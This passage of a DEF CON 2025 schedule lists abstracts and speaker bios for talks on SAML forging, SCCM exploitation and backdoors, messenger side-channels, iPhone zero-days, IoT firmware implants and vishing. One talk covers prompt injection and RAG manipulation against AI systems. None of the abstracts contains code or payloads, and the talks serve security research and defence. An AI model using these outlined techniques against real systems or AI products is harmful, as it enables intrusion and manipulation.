SAMLSmith is the go-to tool for penetrating SAML applications with response forging. An evolution of the original tooling developed for proof-of-concept of SAML response forging in Entra ID, SAMLSmith is the product of continued research on SAML. While far from new, enterprises continue to not prioritize the security of how SaaS applications integrate or understand best practices for securing them. With many factors at play, SAML response forging can range from extremely difficult to near impossible for a SOC to detect. SAMLSmith has a lot of tricks up its sleeve, including: [1] Multiple identity provider response forging. [2] AD FS specific response forging mode. [3] SAML request processing. [4] InResponseTo support. SAMLSmith can be used in several response forging scenarios where the private key material can be obtained. In demonstration of use, we’ll explore using SAMLSmith for performing a Golden SAML attack against AD FS. Further, we’ll demonstrate the use of SAMLSmith that ties into new research around response forging, penetrating certain types of SaaS applications with even more stealth.

Speakers:Eric Woodruff,Tomer Nahum

SpeakerBio:  Eric Woodruff

Eric is the chief identity architect for Semperis. He previously was a member of the security research and product teams. Prior to Semperis, he worked as a security and identity architect at Microsoft partners, spent time at Microsoft as a senior premier field engineer, and spent almost 15 years in the public sector, with 10 of them as a technical manager. He is a Microsoft MVP for security, recognized for his expertise in the Microsoft identity ecosystem. He is a strong proponent of knowledge sharing and spends a good deal of time sharing his insights and expertise at conferences as well as through blogging. He further supports the professional security and identity community as an IDPro member, working as part of the IDPro Body of Knowledge committee.

SpeakerBio:  Tomer Nahum, Security Researcher at Semperis

Tomer is a security researcher at Semperis, where he works to find new attacks and how to defend against them in on-prem identity stacks such as Active Directory, as well as cloud identity systems. He was awarded Most Valuable Researcher (MVR) in 2023 by Microsoft Security Response Center (MSRC).


Return to Index    -    Add to Google    -    ics Calendar file

ASV - Friday - 17:00-17:30 PDT


Title: Satellite Networks Under Siege: Cybersecurity Challenges of Targeted DDoS Attacks
When: Friday, Aug 8, 17:00 - 17:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:
Satellite Networks Under Siege: Cybersecurity Challenges of Targeted DDoS Attacks explores how the rapid evolution of Low Earth Orbit constellations, such as those providing global broadband, has introduced a new frontier of cybersecurity challenges. This presentation delves deep into the unique vulnerabilities of satellite networks—including dynamic topologies, limited bandwidth, and predictable orbital patterns—that enable adversaries to execute persistent, targeted DDoS attacks with minimal botnet footprints. Attendees will learn about advanced attack methodologies and frameworks—exemplified by research on approaches like the HYDRA framework—that optimize botnet composition and allocation for multi-zone disruptions. Combining detailed theoretical models, simulation results, and optimization techniques, this talk provides a comprehensive analysis of both attack strategies and the emerging countermeasures. Focusing on enhancing cybersecurity for critical communication infrastructures, this session presents actionable insights drawn from thorough analysis and illustrative case studies, offering practical recommendations and a clear framework for understanding both offensive tactics and defensive measures essential for securing satellite communications.
SpeakerBio:  Roee Idan, Ben Gurnion University
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 13:30-14:15 PDT


Title: SCCM: The tree that always bears bad fruits
When: Sunday, Aug 10, 13:30 - 14:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Microsoft Configuration Manager, better known as SCCM, has become my go-to target for red team operations. While multiple attack paths were uncovered recently, companies still struggle to close all security gaps. This is largely due to the solution's complexity and historical technical debt, which make it challenging to effectively address and mitigate all security vulnerabilities. Moreover, as it primarily manages computers, taking over an SCCM deployment often leads to the full compromise of the Active Directory, with less hassle than traditional attack paths.

In this talk, I'll be sharing insights gained from my research on the solution that led to the discovery of multiple 0 Day vulnerabilities, such as CVE-2024-43468, an unauthenticated SQL injection. After introducing key concepts, I'll delve into various techniques for performing reconnaissance, tips for understanding the hierarchy and tricks for bypassing certain security boundaries. The session will also cover the discovered vulnerabilities that can lead to the compromise of the deployment.

After showcasing post-exploitation techniques from database access, I'll introduce a battle-tested open-source tool that implements them. And for those interested in persistence, a technique for installing a backdoor as a legitimate servicing endpoint will be shared.

SpeakerBio:  Mehdi "kalimer0x00" Elyassa

I'm a red team operator working at Synacktiv, a French firm dedicated to offensive information security. With over 7 years of experience, I've started my journey on the blue team before transitioning to an offensive role. Today, I conduct adversary simulation engagements for large companies in France, as well as international organizations.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 16:00-16:59 PDT


Title: SEC Vishing Competition (SECVC)
When: Friday, Aug 8, 16:00 - 16:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

After our improv interlude, it's back to the phones as the final teams go live!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 13:30-15:30 PDT


Title: SEC Vishing Competition (SECVC)
When: Friday, Aug 8, 13:30 - 15:30 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Now after our improv break, more teams place live calls, putting polished scripts and fresh research to the test against real corporate defenses in the SECVC!


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Friday - 09:00-11:59 PDT


Title: SEC Vishing Competition (SECVC)
When: Friday, Aug 8, 09:00 - 11:59 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Back again as an official DEF CON contest - join us as teams who've spent months researching and rehearsing place live calls, pitting cunning scripts against real corporate defenses to see who rings in the win!


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 10:00-10:30 PDT


Title: Secret Life of an Automationist: Engineering the Hunt
When: Friday, Aug 8, 10:00 - 10:30 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

If you have tried your hand at bug bounty, you probably heard about automation setups that some hunters use. The caveat here though, is there is little to no information sharing about this topic. I don't claim to be an expert, but after a couple years of tool building and experimenting, I think these kind of systems can be accessible/buildable by anyone. I want to share some of "tips" and "pitfalls" that I have come across building some of my own automation around bug bounty. Topics will range from data engineering, event and data handling, architecture options, different ways to turn data into bugs, etc. I don't pretend to be an expert, but it is my opinion that there is not enough people sharing ideas and techniques when it comes to applying ENGINEERING to bug bounties. Automation, data, and discovery should be words that every bug hunter is fond of, not afraid of.

SpeakerBio:  Gunnar "g0lden" Andrews

Hello! I am an application security engineer by day, and a bug bounty hunter by night! I enjoy turning security research, and bug bounties, into an engineering problem. I love collaborating with others, and I am always trying to learn new technologies. Other than hacking, I enjoy hockey, fitness, exploring, and video games!


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 15:45-16:30 PDT


Title: Secure Code Is Critical Infrastructure: Hacking Policy for the Public Good
When: Friday, Aug 8, 15:45 - 16:30 PDT
Where: LVCCWest-Level2-W232 - Map

Description:
SpeakerBio:  Tanya "SheHacksPurple" Janca, SheHacksPurple

Tanya Janca, aka SheHacksPurple, is the best-selling author of 'Alice and Bob Learn Secure Coding', 'Alice and Bob Learn Application Security’ and the ‘AppSec Antics’ card game. Over her 28-year IT career she has won countless awards (including OWASP Lifetime Distinguished Member and Hacker of the Year), spoken all over the planet, and is a prolific blogger. Tanya has trained thousands of software developers and IT security professionals, via her online academies (We Hack Purple and Semgrep Academy), and her live training programs. Having performed counter-terrorism, led security for the 52nd Canadian general election, developed or secured countless applications, Tanya Janca is widely considered an international authority on the security of software. Tanya currently works at Semgrep as a Security Advocate.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 14:00-14:59 PDT


Title: Securing Intelligence: How hackers are breaking modern AI systems … and how bug bounty programs can keep up
When: Friday, Aug 8, 14:00 - 14:59 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

Dane and Shlomie will share real-world AI vulnerabilities they've discovered in production environments, providing technical deep dives into specific bug classes that impact confidentiality, integrity, and availability, as well as those posing legal and reputational risks. They'll illustrate common flaws—from adversarial prompts and indirect prompt injection to context poisoning and RAG manipulation—while explaining the underlying architecture of affected systems and why traditional defenses often fall short.

They'll also outline practical mitigation strategies, highlighting best practices for organizations deploying AI models. Program managers will leave with concrete guidance on defining effective AI-focused scopes, crafting severity frameworks tailored to probabilistic AI behaviors, and optimizing bug bounty programs for maximum impact. Hackers will gain actionable insights into novel attack techniques, tips for identifying vulnerabilities unique to AI systems, and a clear understanding of how these vulnerabilities translate into real-world organizational risks.

Speakers:Dane Sherrets,Shlomie Liberow

SpeakerBio:  Dane Sherrets, Innovations Architect at HackerOne

Dane is an Innovations Architect at HackerOne, where he helps organizations run AI-focused bug bounty programs and improve the security of emerging technologies. His work includes winning 2nd place in the Department of Defense AI Bias Bounty competition, discovering critical vulnerabilities in platforms like Worldcoin, and helping design and manage Anthropic's AI Safety Bug Bounty program. Drawing on his background as a bug hunter, Dane blends strategic guidance with hands-on expertise to advance the safety and security of disruptive tech across industries.

SpeakerBio:  Shlomie Liberow, HackerOne

Shlomie Liberow is a security researcher who specialises in translating technical vulnerabilities into actionable business risk for enterprises. He has led technical delivery of live hacking events for major organizations, mediating over $20M in bounty payouts by helping companies understand the real-world impact of bugs within their specific environment and risk profile.

As a researcher, he has personally discovered 250+ vulnerabilities across Fortune 500 companies


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Sunday - 12:00-13:50 PDT


Title: Self Custodial Wallet Use
When: Sunday, Aug 10, 12:00 - 13:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

The workshop will begin with brief presentation about cryptocurrency, exchanges, hardware wallets, hot wallets, cold wallets, and other introductory information needed to begin cryptocurrency transactions. Participants will be given a sample wallet for practice purposes only. Participants will be guided through the opening of a wallet, with a detailed discussion on public and private keys and the different types of wallets available for self custody and the different security features of wallets. The discussion will delve into hot security topics, including the importance of randomized seeds and consider a couple of case scenarios where wallets have been hacked due to a lack of security, followed by a discussion on how to prevent these types of security defects. Next, participants will create hot and a cold wallet, each with a twelve word seed. After completing set up of the cold wallet, participants will be required to simulate a lost/stolen/destroyed wallet and wipe the wallet and re-set up the wallet.

SpeakerBio:  HalFinneyIsMyHomeBoy
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 15:00-15:20 PDT


Title: Shaking Out Shells with SSHamble
When: Saturday, Aug 9, 15:00 - 15:20 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Secure Shell (SSH) is finally fun again! After a wild two years, including a near-miss backdoor, clever cryptographic failures, unauthenticated remote code execution in OpenSSH, and piles of state machine bugs and authentication bypass issues, the security of SSH implementations has never been more relevant. This session is an extension of our 2024 work (Unexpected Exposures in the Secure Shell) and includes new research as well as big updates to our open source research and assessment tool, SSHamble.

References:

SpeakerBio:  HD Moore

Most recognized as the creator of Metasploit, HD's professional journey began with exploring telephone networks, developing exploits for the Department of Defense, and hacking into financial institution networks. When he's not working on runZero, he enjoys making weird Go projects, building janky electronics, running in circles, and playing single-player RPGs.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 17:30-17:50 PDT


Title: Silent Leaks: Harvesting Secrets from Shared Linux Environments
When: Friday, Aug 8, 17:30 - 17:50 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

You don’t need a kernel exploit to cross security boundaries in Linux, and all it takes is what the system already gives you. In this talk, I’ll expose a class of quiet yet dangerous vulnerabilities where common system features in multi-user Linux environments leak sensitive information between users by default.

We’ll explore how standard process inspection mechanisms and insecure scripting practices in real-world infrastructures, especially those used by large hosting panel providers can expose database passwords, API tokens, internal URLs, and other secrets to unprivileged users. I’ll demonstrate how simple, legitimate system behaviors can be passively weaponized to gather intelligence, fingerprint users, and pivot across services. All without ever escalating privileges or exploiting a single bug. This talk shows how misconfigurations and design oversights can open the door to unintended visibility.

Whether you're a sysadmin, penetration tester, or just someone who lives in a shell, you’ll leave with a better understanding of what your environment might be silently exposing and how to lock it down.

SpeakerBio:  Cernica Ionut Cosmin

Ionut Cernica began his security journey through Facebook’s bug bounty program and quickly made a name for himself by responsibly disclosing vulnerabilities to major companies including Google, Microsoft, Yahoo, AT&T, eBay, and VMware. With over nine years of experience in web application security and penetration testing, he has built a solid reputation in both offensive and defensive security research.

Beyond bug bounty, Ionut is a seasoned CTF competitor, having participated in over 100 security competitions worldwide. He has represented the PwnThyBytes team in high-profile finals such as Codegate, Trend Micro, and DEF CON. Among his individual accomplishments, he won the mini CTF at the very first edition of AppSec Village at DEF CON.

Currently, Ionut is an Application Security Engineer at UiPath, where he focuses on product security and AI security research.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Friday - 10:15-10:59 PDT


Title: Silent Sabotage: How Nation-State Hackers Turn Human Error into Catastrophic Failures
When: Friday, Aug 8, 10:15 - 10:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Nation-state hackers pose a formidable threat to critical infrastructure, compromising national security, intellectual property, and public safety. This presentation will delve into the tactics, techniques, and procedures (TTPs) employed by nation-state actors, providing a core understanding essential for developing effective defense strategies. Through an in-depth analysis of three real-world case studies, we will expose the implications of nation-state attacks on laboratory, critical infrastructure, and industrial systems. We will examine how these attacks exploit human vulnerabilities, such as social engineering and insider threats, as well as system weaknesses, including misconfiguration and software vulnerabilities. Drawing from recent breaches in research laboratories and industrial manufacturing facilities, we will identify the root causes of these incidents, including human error, malicious insider actions, and inadequate security controls. This presentation aims to provide attendees with a comprehensive understanding of nation-state attack patterns, enabling them to strengthen their organization’s defenses against these sophisticated threats.

Speakers:Nathan Case,Jon McCoy

SpeakerBio:  Nathan Case, CSO at Clarity

Nathan Case is a cybersecurity engineer and executive with over two decades of experience designing, securing, and scaling complex systems across public and private sectors. He currently serves as the Vice President of Cloud Computing and Cyber Solutions at Clarity, leading efforts at the intersection of secure cloud architecture, AI engineering, and national defense. In this role, he provides technical direction, manages multidisciplinary teams, and collaborates closely with government stakeholders to deliver operationally effective solutions that meet mission-critical needs.

SpeakerBio:  Jon McCoy, Security Architect at OWASP

Software security architect, Jon McCoy brings over 20 years of experience in software development and cybersecurity to the forefront. With a strong foundation in .NET development, Jon transitioned into security, driven by a passion for proactive defense strategies and secure coding practices.

A dedicated contributor to the OWASP community, Jon has shared his expertise at numerous industry events, including OWASP Global AppSec. His recent presentation on "Lessons Learned from Past Security Breaches" highlighted critical takeaways for strengthening AppSec efforts before and after incidents.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 15:50-16:20 PDT


Title: Silent Sigma: Unraveling Iranian APT's 0-Day Warfare and Covert C2
When: Friday, Aug 8, 15:50 - 16:20 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Christopher Dio Chavez
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 12:30-13:15 PDT


Title: Silent Signals: Exploiting Security and Privacy Side-Channels in End-to-End Encrypted Messengers
When: Sunday, Aug 10, 12:30 - 13:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

With billions of users worldwide, mobile messaging apps like WhatsApp and Signal have become critical for personal and professional communication. While these platforms promise security and privacy, our research uncovers two significant vulnerabilities that expose users to stealthy tracking and security degradation.

First, we reveal how delivery receipts --commonly used to confirm message delivery-- can be exploited to track a user's online status, screen activity, and device usage without their knowledge. This technique enables passive surveillance, draining a target's battery and data allowance while remaining entirely invisible to them.

Second, we demonstrate a novel attack on WhatsApp's implementation of the Signal Protocol, specifically targeting its Perfect Forward Secrecy (PFS) mechanism. By depleting a victim's stash of ephemeral encryption keys, an attacker can weaken message security, disrupt communication, and exploit flaws in the prekey refilling process.

Both attacks require nothing more than the victim's phone number and leverage fundamental design choices in these widely used platforms.

This talk will provide an in-depth analysis of these vulnerabilities, their implications, and potential mitigations -- challenging the security assumptions of modern encrypted messaging.

References: - Careless Whisper: Exploiting End-to-End Leakage in Mobile Instant Messengers, Gabriel K. Gegenhuber, Maximilian Günther, Markus Maier, Aljosha Judmayer, Florian Holzbauer, Philipp É. Frenzel, Johanna Ullrich; link - Prekey Pogo: Investigating Security and Privacy Issues in WhatsApp's Handshake Mechanism, USENIX WOOT 2025, Gabriel K. Gegenhuber, Philipp É. Frenzel, Maximilian Günther, Aljosha Judmayer; link

Speakers:Gabriel Gegenhuber,Maximilian Günther

SpeakerBio:  Gabriel Gegenhuber

Gabriel is a PhD candidate at the University of Vienna, Austria. He received a bachelor's degree in Software & Information Engineering and a master's degree in Software Engineering & Internet Computing at the TU Wien. Gabriel is conducting research in the area of cellular and mobile networks. This includes Internet measurement technologies, traffic classification systems (e.g., deep packet inspection) and technical measures that are used to detect net neutrality and privacy violations. Furthermore, he's working on improving the MobileAtlas measurement platform for cellular networks.

SpeakerBio:  Maximilian Günther

Max Guenther is master student at University of Vienna. He is a cybersecurity nerd and part-time full stack engineer at Intigriti. Previously, he was security analyst at Austrian Power Grid and security researcher at the Austrian Armed Forces.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Simulated Adversary: Tactics & Tools Training
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Ever wondered what it’s like to be the Villian? Have a propensity for chaos and a penchant for mischief? Seize the opportunity to unleash your inner “bad guy” in a legal and controlled environment. This class, led by Adversary for Hire, Jason E. Street, will teach you how to think and attack like an adversary.

You will learn advanced intelligence gathering techniques and explore non-traditional tactics from one of the most twisted minds in the industry. Using real-world examples along with hands-on practical training, Jayson’s approach highlights the human side of cyber compromise. He will introduce you to the Security Awareness Engagement methodology, which he uses in the field to reveal real-world threats without negative impacts to targets. This methodology employs practical simulations of social engineering attacks.

In addition to simulating remote attacks like phishing and vishing, students will learn how to craft and deploy physical attack payloads with the Hak5 Bash Bunny. Each student will receive a Bash Bunny to take home and use in their new life as a simulated adversary.

This class focuses on the paramount threat to any person or organization: other humans. It provides in-depth understanding of each element in a social engineering attack and where social engineering falls on the kill chain. More importantly, you will leave with an in-depth understanding of how simulated adversaries and social engineering awareness can help people and organizations protect themselves. Sign up for DEF CON's most mischievous training and leave with new skills you will use for life.

Speakers:Kenny Hess,Jayson E. Street

SpeakerBio:  Kenny Hess, Advanced Security Engineer at Secure Yeti

Kenny Hess is an Advanced Security Engineer at Secure Yeti. He is a trusted security consultant who has built a career around developing and testing secure, mission-critical systems for national governments, state agencies, and international corporations. Additionally, he has been able to help businesses of all sizes develop security policies and programs for classified and unclassified systems. Kenny has a B.A. in Journalism and Broadcasting and an M.S. in Telecommunications Management from Oklahoma State University. Because of this diverse educational background, he is able to connect with his clients through clear communication backed by technical expertise. When he's not desperately urging people to use a password manager, you might find him in the kitchen trying a new recipe, or at the airport lounge en route to adventure. Whether he's hacking people, systems, or ingredients, Kenny Hess is always ready to add a dash of fun to everything he does.

SpeakerBio:  Jayson E. Street, Chief Adversarial Officer at Secure Yeti

Jayson E. Street referred to in the past as: a "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series, and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.

He is the Chief Adversarial Officer at Secure Yeti and the author of the "Dissecting the hack: Series" (which is currently required reading at 5 colleges in 3 countries that he knows of). Jayson is also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, SAINTCON & at several other CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.

He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, Biochemical companies, etc. on five continents (Only successfully robbing the wrong bank in Lebanon once, all others he was supposed to)!

He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far, but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Simulated Adversary: Tactics & Tools Training
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

Ever wondered what it’s like to be the Villian? Have a propensity for chaos and a penchant for mischief? Seize the opportunity to unleash your inner “bad guy” in a legal and controlled environment. This class, led by Adversary for Hire, Jason E. Street, will teach you how to think and attack like an adversary.

You will learn advanced intelligence gathering techniques and explore non-traditional tactics from one of the most twisted minds in the industry. Using real-world examples along with hands-on practical training, Jayson’s approach highlights the human side of cyber compromise. He will introduce you to the Security Awareness Engagement methodology, which he uses in the field to reveal real-world threats without negative impacts to targets. This methodology employs practical simulations of social engineering attacks.

In addition to simulating remote attacks like phishing and vishing, students will learn how to craft and deploy physical attack payloads with the Hak5 Bash Bunny. Each student will receive a Bash Bunny to take home and use in their new life as a simulated adversary.

This class focuses on the paramount threat to any person or organization: other humans. It provides in-depth understanding of each element in a social engineering attack and where social engineering falls on the kill chain. More importantly, you will leave with an in-depth understanding of how simulated adversaries and social engineering awareness can help people and organizations protect themselves. Sign up for DEF CON's most mischievous training and leave with new skills you will use for life.

Speakers:Kenny Hess,Jayson E. Street

SpeakerBio:  Kenny Hess, Advanced Security Engineer at Secure Yeti

Kenny Hess is an Advanced Security Engineer at Secure Yeti. He is a trusted security consultant who has built a career around developing and testing secure, mission-critical systems for national governments, state agencies, and international corporations. Additionally, he has been able to help businesses of all sizes develop security policies and programs for classified and unclassified systems. Kenny has a B.A. in Journalism and Broadcasting and an M.S. in Telecommunications Management from Oklahoma State University. Because of this diverse educational background, he is able to connect with his clients through clear communication backed by technical expertise. When he's not desperately urging people to use a password manager, you might find him in the kitchen trying a new recipe, or at the airport lounge en route to adventure. Whether he's hacking people, systems, or ingredients, Kenny Hess is always ready to add a dash of fun to everything he does.

SpeakerBio:  Jayson E. Street, Chief Adversarial Officer at Secure Yeti

Jayson E. Street referred to in the past as: a "notorious hacker" by FOX25 Boston, "World Class Hacker" by National Geographic Breakthrough Series, and described as a "paunchy hacker" by Rolling Stone Magazine. He however prefers if people refer to him simply as a Hacker, Helper & Human.

He is the Chief Adversarial Officer at Secure Yeti and the author of the "Dissecting the hack: Series" (which is currently required reading at 5 colleges in 3 countries that he knows of). Jayson is also the DEF CON Groups Global Ambassador. He's spoken at DEF CON, DEF CON China, GRRCon, SAINTCON & at several other CONs & colleges on a variety of Information Security subjects. He was also a guest lecturer for the Beijing Institute of Technology for 10 years.

He loves to explore the world & networks as much as he can. He has successfully robbed banks, hotels, government facilities, Biochemical companies, etc. on five continents (Only successfully robbing the wrong bank in Lebanon once, all others he was supposed to)!

He is a highly carbonated speaker who has partaken of Pizza from Bulgaria to Brazil & China to The Canary Islands. He does not expect anybody to still be reading this far, but if they are please note he was proud to be chosen as one of Time's persons of the year for 2006.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 14:30-15:15 PDT


Title: Siri-ously Leaky: Exploring Overlooked Attack Surfaces Across Apple's Ecosystem
When: Friday, Aug 8, 14:30 - 15:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Apple champions user privacy and security, but beneath its glossy screens and polished interfaces lies an overlooked field of subtle vulnerabilities lurking within trusted, everyday features: Siri, Spotlight, Safari, Apple Intelligence, and Apple's official support systems. This talk dives deeply into multiple zero-day issues discovered on fully updated, non-jailbroken iPhones—no specialized tools required. I'll demonstrate how missing lock-state checks, Siri context confusion, race conditions, faulty Unicode parsing, incomplete patches, and other subtle oversights enabled me to bypass Face ID locks, retrieve sensitive user data, spoof emails, and trigger daemon crashes. Specifically, I'll show you how I disclosed sensitive data on locked devices via Siri (CVE-2025-24198) and Spotlight (CVE-2024-44235), bypassed Safari's Face ID protection on private tabs (CVE-2025-30468), executed deceptive email spoofing (CVE-2025-24225), leaked Apple Intelligence internal prompts and Private Cloud Compute data to ChatGPT, and exploited an unresolved IDOR vulnerability on Apple's support site to retrieve almost any customer data.

References:

SpeakerBio:  Richard "richeeta" Hyunho Im

Richard Hyunho Im (@richeeta) is a senior security engineer and independent vulnerability researcher at Route Zero Security. Currently ranked among the top 25 researchers in OpenAI's bug bounty program, Richard has also received security acknowledgements from Apple (CVE-2025-24198, CVE-2025-24225, CVE-2025-30468, and CVE-2024-44235), Microsoft, Google, and the BBC. His research highlights overlooked attack surfaces, focusing on practical exploitation that challenges assumptions about everyday software security.


Return to Index    -    Add to Google    -    ics Calendar file

CHV - Friday - 16:30-16:59 PDT


Title: Smart Bus Smart Hacking: From Free WiFi to Total Control
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:

Have you ever wondered how the On-Board Units (OBUs) in smart buses communicate and authenticate with Advanced Public Transportation Services (APTS) and Advanced Driver Assistance Systems (ADAS)? Shockingly, these systems can be easily tampered with and forged! In this session, We will share over 10 different vulnerabilities discovered from real experiences riding public transit: starting from connecting to the bus-provided free WiFi, hacking into the vehicular router, gaining access to the bus’s private network area, and ultimately controlling the communication between ADAS and APTS—including manipulating onboard LED displays, stealing driver and passenger information, acquiring bus operational data, and even penetrating the backend API servers of the transportation company. We also uncovered severe vulnerabilities and backdoors in cybersecurity-certified vehicular routers and monitoring equipment that could potentially compromise all global units of the same model. Through this presentation, attendees will gain an in-depth understanding of attack vectors starting from open free WiFi, expose security design flaws in connected public transport vehicles, and discuss potential systemic issues from a regulatory and specification-setting perspective.

Speakers:Chiao-Lin "Steven Meow" Yu,Kai-Ching "Keniver" Wang

SpeakerBio:  Chiao-Lin "Steven Meow" Yu, Threat Researcher at Trend Micro Red Team

Chiao-Lin Yu (Steven Meow) currently serves as a Red Team Cyber Threat Researcher at Trend Micro. He holds numerous professional certifications including OSCE³ , OSEP, OSWE, OSED, OSCP, CRTP, CARTP, CESP-ADCS, LTP, CPENT, GCP ACE. Steven has previously presented at events such as Security BSides Tokyo 2023, HITCON Bounty House, and CYBERSEC 2024, 2025. He has disclosed 20+ CVE vulnerabilities in major companies like VMware, D-Link, and Zyxel. His expertise spans red team exercises, web security and IoT security.

SpeakerBio:  Kai-Ching "Keniver" Wang, Senior Security Researcher at CHT Security

Kai-Ching Wang (Keniver) is a Senior Security Researcher at CHT Security. He specializes in red team assessments and comprehensive security reviews, with a current focus on hacking IoT devices and cloud-native infrastructure. He has presented his research on the security of cloud-connected IoT camera systems at conferences such as SECCON in Japan and HITCON in Taiwan.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Sunday - 12:00-12:30 PDT


Title: Smart Devices, Dumb Resets? Testing Firmware Persistence in Commercial IoT
When: Sunday, Aug 10, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W231 - Map

Description:

The rapid proliferation of consumer IoT devices has introduced new attack vectors beyond traditional exploitation. One overlooked risk lies in firmware persistence in returned devices—an issue that could enable mass surveillance, botnet propagation, or backdoor persistence at scale. This research investigates whether major retailers properly reset IoT firmware before reselling returned products, exposing critical gaps in supply chain security.

In this experiment, commercial IoT devices are purchased, modified with custom firmware embedding a simple callback, and then returned to the store. The devices are later repurchased and analyzed to determine if retailers performed proper firmware resets or if malicious code remained intact. Findings from this research reveal inconsistencies in retailer sanitization policies, with some major retailers failing to properly wipe and reflash firmware before resale. This talk will demonstrate examples of persistent firmware modifications, discuss the potential for IoT-based supply chain attacks, and propose real-world mitigation strategies for manufacturers, retailers, and consumers.

Attendees will leave with a deeper understanding of how IoT firmware sanitization failures create a new class of attack vectors—and how threat actors could exploit this to build persistent IoT botnets, data-exfiltration implants, or unauthorized surveillance tools.

SpeakerBio:  Matei Josephs, Senior Penetration Tester at Happening

Matei Josephs breaks things for a living - especially if they beep, blink, or pretend to be "smart". Printers, kiosks, routers, and random IoT junk live in fear when he's nearby. He's a Senior Penetration Tester at Happening, he discovered 9 CVEs and loves hacking at scale. In this talk, "Smart Devices, Dumb Resets? Testing Firmware Persistence in Commercial IoT", Matei reveals how threat actors can implant persistent backdoors in smart devices, then return them for resale through legitimate retailers. Because factory reset processes often fail to wipe firmware-level compromises, attackers can exploit the trust users place in brand-name resellers—turning returned devices into credible, persistent attack vectors.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 11:20-11:50 PDT


Title: Smashing the Sandbox: Inside DBatLoader's Unique Evasion Techniques
When: Saturday, Aug 9, 11:20 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Kyle "d4rksystem" Cucci, Staff Security Research Engineer @ Proofpoint

Kyle Cucci is a malware analyst and detection engineer with Proofpoint’s Threat Research team. Previously, he led the forensic investigations and malware research teams at a large global bank. Kyle is the author of the book "Evasive Malware: A Field Guide to Detecting, Analyzing, and Defeating Advanced Threats" and is a regular speaker at conferences, speaking on topics like malware analysis, offensive security, and security engineering. In his free time, Kyle enjoys contributing to the community via open source tooling, research, and blogging.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 09:00-12:59 PDT


Title: SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor
When: Friday, Aug 8, 09:00 - 12:59 PDT
Where: LVCCNorth-Level2-N258 - Map

Description:

Join us for an engaging and interactive workshop where we delve into the hidden risks within your configurations in Snowflake. This intermediate-level session is designed to provide hands-on experience with vulnerable and misconfigured environments, utilizing plug-and-play Terraform scripts and your free-tier Snowflake and AWS accounts. Attendees will explore the UNC5337 data-theft and extortion campaign, and other common Snowflake misconfigurations and risks through a fun and interactive "Capture The Flag" (CTF) style attack scenario, with the main objective of leaking sensitive data from Snowflake.

Key Topics: -Snowflake as a data-lake service and common security pitfalls. -UNC5337 Data-Theft and Extortion Campaign: Gain insights into real-world cyber threats and how they operate. -Solve problems and bypass misconfigured security mechanisms. -Learn about data-related risks that could lead to a data breach. Technical Level: Intermediate Learning Outcomes: By the end of this workshop, attendees will: -Understand best practices for securing configurations in Snowflake. -Gain practical experience in identifying and mitigating unsecured configurations. -Gain knowledge to handle real-world cyber threats effectively.

Speakers:Lior Adar,Chen Levy Ben Aroy

SpeakerBio:  Lior Adar, Cloud Security Researcher at Varonis

Lior is a senior security researcher at Varonis and a passionate security enthusiast with a broad background in red team operations, penetration testing, incident response, and advanced security research. With experience at Palo Alto Networks and Team8, Lior has enhanced his expertise in cybersecurity research across multiple domains, including various cloud providers and SaaS platforms. Known for contributing to the LOLBAS project, he specializes in evaluating emerging threats and analyzing data signals, combining a hands-on approach with a deep understanding of attacker perspective.

SpeakerBio:  Chen Levy Ben Aroy, Cloud Security Research Team Lead at Varonis

